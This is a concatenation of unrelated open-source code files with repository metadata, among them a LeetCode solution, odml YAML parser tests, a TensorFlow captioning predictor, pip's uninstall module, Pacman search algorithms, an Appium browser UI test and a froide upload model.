6a87563d50a56154d56a3e17b55a97e0d205ef9b | aa3dc5ae4fa7d531bbaa75c3008031f2a1b8845d | /1460. Make Two Arrays Equal by Reversing Sub-arrays.py | bf19eb4de403cc17d243c4a1a98166c93118834e | [] | no_license | alankrit03/LeetCode_Solutions | 354e797d1d5f5a78b116c1f9a3034dd651d71d9a | f8ca46afdfbd67509dde63e9cdc5fd178b6f111b | refs/heads/master | 2021-01-08T17:41:22.976375 | 2020-11-03T17:01:37 | 2020-11-03T17:01:37 | 242,097,188 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | class Solution:
def canBeEqual(self, target, arr) -> bool:
from collections import Counter
return Counter(target) == Counter(arr) | [
"[email protected]"
] | |
43f07e970a3ab93ee5c4e86d16c7fc72c4f5b1d9 | 64ff0d2b1f12c321e8fe44d0524bb444820b21f7 | /test/test_parser_yaml.py | 0c77dd18718c76c0ed43fed9d0a856c302417e4d | [
"BSD-2-Clause"
] | permissive | Aniket-Pradhan/python-odml | 8ffd460cd8560b03f439b46b85fc1c78292c6191 | 48e55a264e38829d90f3b8def37e4d2d7b39337f | refs/heads/master | 2020-12-04T11:32:21.717225 | 2020-01-16T06:34:09 | 2020-01-16T16:59:29 | 231,748,290 | 0 | 0 | NOASSERTION | 2020-01-04T10:58:14 | 2020-01-04T10:58:14 | null | UTF-8 | Python | false | false | 1,495 | py | import os
import unittest
import yaml
from odml.tools import dict_parser
from odml.tools.parser_utils import ParserException, InvalidVersionException
class TestYAMLParser(unittest.TestCase):
def setUp(self):
dir_path = os.path.dirname(os.path.realpath(__file__))
self.basepath = os.path.join(dir_path, "resources")
self.yaml_reader = dict_parser.DictReader()
def test_missing_root(self):
filename = "missing_root.yaml"
message = "Missing root element"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_missing_version(self):
filename = "missing_version.yaml"
message = "Could not find odml-version"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.load(raw_data)
with self.assertRaises(ParserException) as exc:
_ = self.yaml_reader.to_odml(parsed_doc)
self.assertIn(message, str(exc.exception))
def test_invalid_version(self):
filename = "invalid_version.yaml"
with open(os.path.join(self.basepath, filename)) as raw_data:
parsed_doc = yaml.load(raw_data)
with self.assertRaises(InvalidVersionException):
_ = self.yaml_reader.to_odml(parsed_doc)
| [
"[email protected]"
] | |
56c2fc2b809384b7692cba50dfc269fcf1af96cc | e6f1137903b9658e5e3c1ee51201a931894303b9 | /deepiu/image_caption/algos/history/v1/show_and_tell_predictor.py | 63ca6f464f3d5f17f6249c5f15a71bc02c5e91e1 | [] | no_license | fword/hasky | 8ed69ef85bb34823d9ade27bb3b19aac02872440 | d3c680ffa04f7487b931a5575977798157b42b7e | refs/heads/master | 2021-01-23T01:18:49.275631 | 2017-03-18T13:01:27 | 2017-03-18T13:01:27 | 85,898,744 | 1 | 1 | null | 2017-03-23T02:39:06 | 2017-03-23T02:39:06 | null | UTF-8 | Python | false | false | 4,840 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ==============================================================================
# \file show_and_tell_predictor.py
# \author chenghuige
# \date 2016-09-04 17:50:21.017234
# \Description
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
flags = tf.app.flags
FLAGS = flags.FLAGS
import numpy as np
import melt
import conf
from conf import IMAGE_FEATURE_LEN, TEXT_MAX_WORDS
import vocabulary
import text2ids
from text2ids import idslist2texts
import gezi
from algos.show_and_tell import ShowAndTell
class SeqDecodeMethod():
max_prob = 0
sample = 1
full_sample = 2
beam_search = 3
class ShowAndTellPredictor(ShowAndTell, melt.PredictorBase):
def __init__(self):
#super(ShowAndTellPredictor, self).__init__()
melt.PredictorBase.__init__(self)
ShowAndTell.__init__(self, False)
def init_predict_texts(self, decode_method=0, beam_size=5):
"""
init for generate texts
"""
self.image_feature_place = tf.placeholder(tf.float32, [None, IMAGE_FEATURE_LEN], name='image')
self.texts = self.build_predict_texts_graph(self.image_feature_place, decode_method, beam_size)
def predict_texts(self, images):
feed_dict = {
self.image_feature_place: images,
}
vocab = vocabulary.get_vocab()
generated_words = self.sess.run(self.texts, feed_dict)
texts = idslist2texts(generated_words)
return texts
def init_predict(self):
self.image_feature_place = tf.placeholder(tf.float32, [None, IMAGE_FEATURE_LEN], name='image')
self.text = tf.placeholder(tf.int64, [None, TEXT_MAX_WORDS])
self.loss = self.build_predict_graph(self.image_feature_place, self.text)
def predict(self, image, text):
"""
default usage is one single image , single text predict one sim score
"""
feed_dict = {
self.image_feature_place: image.reshape([-1, IMAGE_FEATURE_LEN]),
self.text: text.reshape([-1, TEXT_MAX_WORDS]),
}
loss = self.sess.run(self.loss, feed_dict)
return loss
def bulk_predict(self, images, texts):
"""
input multiple images, multiple texts
outupt:
image0, text0_score, text1_score ...
image1, text0_score, text1_score ...
...
"""
scores = []
for image in images:
stacked_images = np.array([image] * len(texts))
score = self.predict(stacked_images, texts)
scores.append(score)
return np.array(scores)
def build_predict_texts_graph(self, image, decode_method=0, beam_size=5):
"""
@TODO beam search, early stop maybe need c++ op
"""
batch_size = tf.shape(image)[0]
image_emb = tf.matmul(image, self.encode_img_W) + self.encode_img_b
state = self.cell.zero_state(batch_size, tf.float32)
generated_words = []
max_words = TEXT_MAX_WORDS
with tf.variable_scope("RNN"):
(output, state) = self.cell(image_emb, state)
last_word = tf.nn.embedding_lookup(self.emb, tf.zeros([batch_size], tf.int32)) + self.bemb
#last_word = image_emb
for i in range(max_words):
#if i > 0: tf.get_variable_scope().reuse_variables()
tf.get_variable_scope().reuse_variables()
(output, state) = self.cell(last_word, state)
with tf.device('/cpu:0'):
logit_words = tf.matmul(output, self.embed_word_W) + self.embed_word_b
top_prob_words = None
if decode_method == SeqDecodeMethod.max_prob:
max_prob_word = tf.argmax(logit_words, 1)
elif decode_method == SeqDecodeMethod.sample:
max_prob_word = tf.nn.top_k(logit_words, beam_size)[1][:, np.random.choice(beam_size, 1)]
elif decode_method == SeqDecodeMethod.full_sample:
top_prob_words = tf.nn.top_k(logit_words, beam_size)[1]
max_prob_word = top_prob_words[:, np.random.choice(beam_size, 1)]
elif decode_method == SeqDecodeMethod.beam_search:
raise ValueError('beam search nor implemented yet')
else:
raise ValueError('not supported decode method')
last_word = tf.nn.embedding_lookup(self.emb, max_prob_word) + self.bemb
max_prob_word = tf.reshape(max_prob_word, [batch_size, -1])
if top_prob_words is not None:
generated_words.append(top_prob_words)
else:
generated_words.append(max_prob_word)
generated_words = tf.concat(1, generated_words)
return generated_words
def build_predict_graph(self, image, text):
image = tf.reshape(image, [1, IMAGE_FEATURE_LEN])
text = tf.reshape(text, [1, TEXT_MAX_WORDS])
loss = self.build_graph(image, text, is_tranining=False)
return loss
| [
"[email protected]"
] | |
4e3d7ecbd55853ed72a0d64d4f743af1f873e7b8 | ce4f1810b8011f05f4e9f8b67959b6a2994ac821 | /GAVOCoverage/temp-python/lib/python2.7/site-packages/pip/req/req_uninstall.py | 90a593628d08a707f6d3d9fc6c65406149bd8b5e | [] | no_license | Hyradus/VO_QGIS3.x_plugin | b11d3b18e473861b6d0733c3783c40af6e8eb039 | 9ab9acb4756c415797b5a7e64389978a84a32c23 | refs/heads/master | 2022-04-14T00:25:12.283460 | 2020-04-02T17:18:50 | 2020-04-02T17:18:50 | 248,215,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,937 | py | from __future__ import absolute_import
from builtins import object
import logging
import os
import tempfile
from pip.compat import uses_pycache, WINDOWS, cache_from_source
from pip.exceptions import UninstallationError
from pip.utils import rmtree, ask, is_local, renames, normalize_path
from pip.utils.logging import indent_log
logger = logging.getLogger(__name__)
class UninstallPathSet(object):
"""A set of file paths to be removed in the uninstallation of a
requirement."""
def __init__(self, dist):
self.paths = set()
self._refuse = set()
self.pth = {}
self.dist = dist
self.save_dir = None
self._moved_paths = []
def _permitted(self, path):
"""
Return True if the given path is one we are permitted to
remove/modify, False otherwise.
"""
return is_local(path)
def add(self, path):
head, tail = os.path.split(path)
# we normalize the head to resolve parent directory symlinks, but not
# the tail, since we only want to uninstall symlinks, not their targets
path = os.path.join(normalize_path(head), os.path.normcase(tail))
if not os.path.exists(path):
return
if self._permitted(path):
self.paths.add(path)
else:
self._refuse.add(path)
# __pycache__ files can show up after 'installed-files.txt' is created,
# due to imports
if os.path.splitext(path)[1] == '.py' and uses_pycache:
self.add(cache_from_source(path))
def add_pth(self, pth_file, entry):
pth_file = normalize_path(pth_file)
if self._permitted(pth_file):
if pth_file not in self.pth:
self.pth[pth_file] = UninstallPthEntries(pth_file)
self.pth[pth_file].add(entry)
else:
self._refuse.add(pth_file)
def compact(self, paths):
"""Compact a path set to contain the minimal number of paths
necessary to contain all paths in the set. If /a/path/ and
/a/path/to/a/file.txt are both in the set, leave only the
shorter path."""
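        # e.g. compact({'/a/path/', '/a/path/to/a/file.txt'}) -> {'/a/path/'}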
short_paths = set()
for path in sorted(paths, key=len):
if not any([
(path.startswith(shortpath) and
path[len(shortpath.rstrip(os.path.sep))] == os.path.sep)
for shortpath in short_paths]):
short_paths.add(path)
return short_paths
def _stash(self, path):
return os.path.join(
self.save_dir, os.path.splitdrive(path)[1].lstrip(os.path.sep))
def remove(self, auto_confirm=False):
"""Remove paths in ``self.paths`` with confirmation (unless
``auto_confirm`` is True)."""
if not self.paths:
logger.info(
"Can't uninstall '%s'. No files were found to uninstall.",
self.dist.project_name,
)
return
logger.info(
'Uninstalling %s-%s:',
self.dist.project_name, self.dist.version
)
with indent_log():
paths = sorted(self.compact(self.paths))
if auto_confirm:
response = 'y'
else:
for path in paths:
logger.info(path)
response = ask('Proceed (y/n)? ', ('y', 'n'))
if self._refuse:
logger.info('Not removing or modifying (outside of prefix):')
for path in self.compact(self._refuse):
logger.info(path)
if response == 'y':
self.save_dir = tempfile.mkdtemp(suffix='-uninstall',
prefix='pip-')
for path in paths:
new_path = self._stash(path)
logger.debug('Removing file or directory %s', path)
self._moved_paths.append(path)
renames(path, new_path)
for pth in list(self.pth.values()):
pth.remove()
logger.info(
'Successfully uninstalled %s-%s',
self.dist.project_name, self.dist.version
)
def rollback(self):
"""Rollback the changes previously made by remove()."""
if self.save_dir is None:
logger.error(
"Can't roll back %s; was not uninstalled",
self.dist.project_name,
)
return False
logger.info('Rolling back uninstall of %s', self.dist.project_name)
for path in self._moved_paths:
tmp_path = self._stash(path)
logger.debug('Replacing %s', path)
renames(tmp_path, path)
for pth in list(self.pth.values()):
pth.rollback()
def commit(self):
"""Remove temporary save dir: rollback will no longer be possible."""
if self.save_dir is not None:
rmtree(self.save_dir)
self.save_dir = None
self._moved_paths = []
class UninstallPthEntries(object):
def __init__(self, pth_file):
if not os.path.isfile(pth_file):
raise UninstallationError(
"Cannot remove entries from nonexistent file %s" % pth_file
)
self.file = pth_file
self.entries = set()
self._saved_lines = None
def add(self, entry):
entry = os.path.normcase(entry)
# On Windows, os.path.normcase converts the entry to use
# backslashes. This is correct for entries that describe absolute
# paths outside of site-packages, but all the others use forward
# slashes.
if WINDOWS and not os.path.splitdrive(entry)[0]:
entry = entry.replace('\\', '/')
self.entries.add(entry)
def remove(self):
logger.debug('Removing pth entries from %s:', self.file)
with open(self.file, 'rb') as fh:
# windows uses '\r\n' with py3k, but uses '\n' with py2.x
lines = fh.readlines()
self._saved_lines = lines
if any(b'\r\n' in line for line in lines):
endline = '\r\n'
else:
endline = '\n'
for entry in self.entries:
try:
logger.debug('Removing entry: %s', entry)
lines.remove((entry + endline).encode("utf-8"))
except ValueError:
pass
with open(self.file, 'wb') as fh:
fh.writelines(lines)
def rollback(self):
if self._saved_lines is None:
logger.error(
'Cannot roll back changes to %s, none were made', self.file
)
return False
logger.debug('Rolling %s back to previous state', self.file)
with open(self.file, 'wb') as fh:
fh.writelines(self._saved_lines)
return True
c5c52a34b30735cf8048a66d5858079d6df8527b | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /vAk9SBqYmj6hXKfrD_16.py | a18522316d4af7072720d687cb474b1b2f6e58b9 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py | """
In this challenge, you have to implement a function that returns the given
distance `kilometers` converted into miles. You have to round the result up to
the fifth decimal digit.
### Examples
km_to_miles(2) โ 1.24274
km_to_miles(6) โ 3.72823
km_to_miles(8) โ 4.97097
### Notes
1 kilometer = 0.621371 miles.
"""
def km_to_miles(kilometers):
return round(kilometers * 0.621371, 5)
| [
"[email protected]"
] | |
1955002f06ce2a8c4cb851a8219ebe39c214db28 | 8f0ee068dc5f78491812ee8fec4ecc4ad48be8b5 | /search/search.py | fc18b93f5127bdc5849bdba83db82fd26f0fd190 | [] | no_license | russkingit/Pacman-project-Artificial-Intellengence-python | b36dc48b12f35082b6ac2aac4620d50dec9b3ddf | 553618ed58de51a7c1d1eaa90fb0441dc9d8e34b | refs/heads/master | 2020-04-20T02:27:31.226385 | 2019-02-01T05:03:40 | 2019-02-01T05:03:40 | 168,390,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,893 | py | # search.py
# ---------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# ([email protected]) and Dan Klein ([email protected]).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel ([email protected]).
"""
In search.py, you will implement generic search algorithms which are called by
Pacman agents (in searchAgents.py).
"""
import util
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem.
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state.
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost' is
the incremental cost of expanding to that successor.
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions.
The sequence must be composed of legal moves.
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other maze, the
sequence of moves will be incorrect, so only use this for tinyMaze.
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s, s, w, s, w, w, s, w]
def depthFirstSearch(problem):
"""
Search the deepest nodes in the search tree first.
Your search algorithm needs to return a list of actions that reaches the
goal. Make sure to implement a graph search algorithm.
To get started, you might want to try some of these simple commands to
understand the search problem that is being passed in:
print "Start:", problem.getStartState()
print "Is the start a goal?", problem.isGoalState(problem.getStartState())
print "Start's successors:", problem.getSuccessors(problem.getStartState())
"""
"*** YOUR CODE HERE ***"
fringe = util.Stack()
visited = []
path = []
    tmpPath = util.Stack()  # stores the path to each successor
currentState = problem.getStartState()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
fringe.push(successor)
tmpPath.push(path + [action])
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def breadthFirstSearch(problem):
"""Search the shallowest nodes in the search tree first."""
"*** YOUR CODE HERE ***"
fringe = util.Queue()
visited = []
path = []
    tmpPath = util.Queue()  # stores the path to each successor
currentState = problem.getStartState()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
fringe.push(successor)
tmpPath.push(path + [action])
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def uniformCostSearch(problem):
"""Search the node of least total cost first."""
"*** YOUR CODE HERE ***"
fringe = util.PriorityQueue()
visited = []
path = []
    tmpPath = util.PriorityQueue()  # stores the path to each successor
fringe.push(problem.getStartState(),0)
currentState = fringe.pop()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
                tmpCost = problem.getCostOfActions(path + [action])
fringe.push(successor, tmpCost)
tmpPath.push(path + [action], tmpCost)
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
path = tmpPath.pop() #path to currentState from startState
return path
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
"""Search the node that has the lowest combined cost and heuristic first."""
"*** YOUR CODE HERE ***"
fringe = util.PriorityQueue()
visited = []
path = []
    tmpPath = util.PriorityQueue()  # stores the path to each successor
fringe.push(problem.getStartState(),0)
currentState = fringe.pop()
while not problem.isGoalState(currentState):
if currentState not in visited:
visited.append(currentState)
for successor, action, stepCost in problem.getSuccessors(currentState):
                tmpCost = problem.getCostOfActions(path + [action]) + heuristic(successor, problem)  # f(n) = g(n) + h(n)
fringe.push(successor, tmpCost)
tmpPath.push(path + [action], tmpCost)
if fringe.isEmpty():
print 'search fail!'
return False #search fail
currentState = fringe.pop()
        path = tmpPath.pop()  # path to currentState from startState
return path
# Abbreviations
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
0e04795723c5e4257eec9e7bdd971712e6369da2 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/tintbrowser/testcase/firstcases/testcase7_023.py | fb1e9d767741ee7ec7143ea90c07655d38f16cfe | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,905 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.tint',
'appActivity' : 'org.tint.ui.activities.TintBrowserActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.tint/org.tint.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str):
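    # Retry the uiautomator lookup for up to ~5 s; as a fallback, tap (50, 50)
    # once and attempt one final lookup.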
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2):
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper):
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase023
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/BtnAddTab\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Tap to enter an URL or a search.\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/BookmarkRow.Thumbnail\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/MenuButton\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
driver.press_keycode(82)
driver.press_keycode(82)
element = getElememtBack(driver, "new UiSelector().text(\"Decline\")", "new UiSelector().className(\"android.widget.Button\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"Full screen\")", "new UiSelector().className(\"android.widget.TextView\").instance(3)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/ExitFullScreen\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12st://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12tp://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("test://tests//en.m.wikipedia.org/wiki/Main_Page");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarGoStopReload\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"http://test//test12s//hk.mobi.yahoo.com/\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("http://tests//en.m.wikipedia.org/wiki/Main_Page");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("12st://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("test://testststs//www.ebay.com/");
element = getElememt(driver, "new UiSelector().resourceId(\"org.tint:id/UrlBarUrlEdit\").className(\"android.widget.EditText\")")
element.clear()
element.send_keys("http://tests//en.m.wikipedia.org/wiki/Main_Page");
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"7_023\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'org.tint'):
cpackage = "adb shell am force-stop " + cpackage
        os.popen(cpackage)
66ae5218e083cec68b52061e500c88077eb68ff4 | 0c95806a805e63a65ce524bac9f2c230c08787dc | /examples/get_temps.py | 18a948ce04c96b2251e7cff05c33435f375c1809 | [
"MIT"
] | permissive | chenchix/melcloud | 4a8e9684e4f38e63871ec543b6a1fdb22fc7628e | 64fe66195ca4e0811391f9b52670ff27954043de | refs/heads/master | 2022-08-16T01:34:40.749190 | 2020-05-29T08:27:40 | 2020-05-29T08:52:47 | 267,796,720 | 0 | 0 | null | 2020-05-29T07:40:36 | 2020-05-29T07:40:36 | null | UTF-8 | Python | false | false | 957 | py | # coding=utf-8
from melcloud import MELCloud
from melcloud.constants import Languages
__author__ = "Gareth Coles"
platform = MELCloud(Languages.EN)
platform.login("<EMAIL ADDRESS>", "<PASSWORD>")
if platform.logged_in:
print(f"Logged in as {platform.account.name}")
platform.load_devices()
for building in platform.buildings:
print(f"Building: {building.id} ({building.name})")
for floor in building.floors:
print(f"> Floor: {floor.id} ({floor.name})")
for device in floor.devices:
print(f">> Device: {device.device_id} ({device.device_name})")
print(f" Zone 1: Currently: {device.room_temperature_zone_1}, Target: {device.set_temperature_zone_1}")
print(f" Zone 2: Currently: {device.room_temperature_zone_2}, Target: {device.set_temperature_zone_2}")
print(f" Current weather: {device.weather_observations[0].condition_name}")
# ---- infoaed/froide -- froide/upload/models.py (MIT) ----
import json
import os
import tempfile
import uuid
from django.db import models
from django.urls import resolve, Resolver404
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.core.files import File
from django_fsm import FSMField, transition
from .utils import write_bytes_to_file
class states:
INITIAL = 'initial'
RECEIVING = 'receiving'
SAVING = 'saving'
DONE = 'done'
class TusFile(File):
"""
A TUS uploaded file, allow direct move
"""
def temporary_file_path(self):
"""Return the full path of this file."""
return self.file.name
class AbstractUpload(models.Model):
"""
Abstract model for managing TUS uploads
"""
guid = models.UUIDField(_('GUID'), default=uuid.uuid4, unique=True)
state = FSMField(default=states.INITIAL)
upload_offset = models.BigIntegerField(default=0)
upload_length = models.BigIntegerField(default=-1)
upload_metadata = models.TextField(blank=True)
filename = models.CharField(max_length=255, blank=True)
temporary_file_path = models.CharField(max_length=4096, null=True)
expires = models.DateTimeField(null=True, blank=True)
class Meta:
abstract = True
def get_metadata(self):
return json.loads(self.upload_metadata)
def clean_fields(self, exclude=None):
super().clean_fields(exclude=exclude)
if self.upload_offset < 0:
raise ValidationError(_('upload_offset should be >= 0.'))
def write_data(self, upload_bytes, chunk_size):
num_bytes_written = write_bytes_to_file(
self.temporary_file_path,
self.upload_offset,
upload_bytes,
makedirs=True
)
if num_bytes_written > 0:
self.upload_offset += num_bytes_written
self.save()
@property
def size(self):
return self.upload_offset
@property
def content_type(self):
return self.get_metadata().get('filetype')
@property
def name(self):
return self.filename
def delete(self, *args, **kwargs):
if self.temporary_file_exists():
os.remove(self.temporary_file_path)
super().delete(*args, **kwargs)
def get_file(self):
if not self.is_complete():
return None
if self.temporary_file_exists():
return TusFile(open(self.temporary_file_path, 'rb'))
return None
def generate_filename(self):
return os.path.join('{}.bin'.format(uuid.uuid4()))
def save(self, force_insert=False, force_update=False, using=None, update_fields=None):
if not self.filename:
self.filename = self.generate_filename()
return super().save(
force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)
def is_complete(self):
return self.upload_offset == self.upload_length
def temporary_file_exists(self):
return self.temporary_file_path and os.path.isfile(self.temporary_file_path)
def get_or_create_temporary_file(self):
if not self.temporary_file_path:
fd, path = tempfile.mkstemp(prefix="tus-upload-")
os.close(fd)
self.temporary_file_path = path
self.save()
assert os.path.isfile(self.temporary_file_path)
return self.temporary_file_path
@transition(field=state, source=states.INITIAL, target=states.RECEIVING, conditions=[temporary_file_exists])
def start_receiving(self):
"""
State transition to indicate the first file chunk has been received successfully
"""
# Trigger signal
# signals.receiving.send(sender=self.__class__, instance=self)
def ensure_saving(self):
if self.state == states.RECEIVING:
self.start_saving()
@transition(field=state, source=states.RECEIVING, target=states.SAVING, conditions=[is_complete])
def start_saving(self):
"""
State transition to indicate that the upload is complete, and that the temporary file will be transferred to
its final destination.
"""
# Trigger signal
# signals.saving.send(sender=self.__class__, instance=self)
@transition(field=state, source=states.SAVING, target=states.DONE)
def finish(self):
"""
State transition to indicate the upload is ready and the file is ready for access
"""
# Trigger signal
class UploadManager(models.Manager):
def get_by_url(self, upload_url, user=None, token=None):
try:
match = resolve(upload_url)
except Resolver404:
return None
guid = match.kwargs.get('guid')
if guid is None:
return None
try:
return Upload.objects.get(
user=user, token=token, guid=guid
)
except Upload.DoesNotExist:
return None
class Upload(AbstractUpload):
user = models.ForeignKey(
get_user_model(), blank=True, null=True,
on_delete=models.CASCADE
)
token = models.UUIDField(null=True, blank=True)
objects = UploadManager()
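# Illustrative sketch (editor's addition, not part of the app): how a chunked
# TUS upload could drive the state machine defined above. The chunk source and
# the concrete `upload` instance are assumptions.
def _example_tus_flow(upload, chunks):
    upload.get_or_create_temporary_file()
    upload.start_receiving()            # FSM: initial -> receiving
    for chunk in chunks:
        upload.write_data(chunk, chunk_size=len(chunk))
    if upload.is_complete():
        upload.start_saving()           # FSM: receiving -> saving
        upload.finish()                 # FSM: saving -> done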
# ---- vivimouret29/pulumi-azure-native -- sdk/python/pulumi_azure_native/containerinstance/v20170801preview/container_group.py (BSD-3-Clause, Apache-2.0) ----
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['ContainerGroupArgs', 'ContainerGroup']
@pulumi.input_type
class ContainerGroupArgs:
def __init__(__self__, *,
containers: pulumi.Input[Sequence[pulumi.Input['ContainerArgs']]],
os_type: pulumi.Input[Union[str, 'OperatingSystemTypes']],
resource_group_name: pulumi.Input[str],
container_group_name: Optional[pulumi.Input[str]] = None,
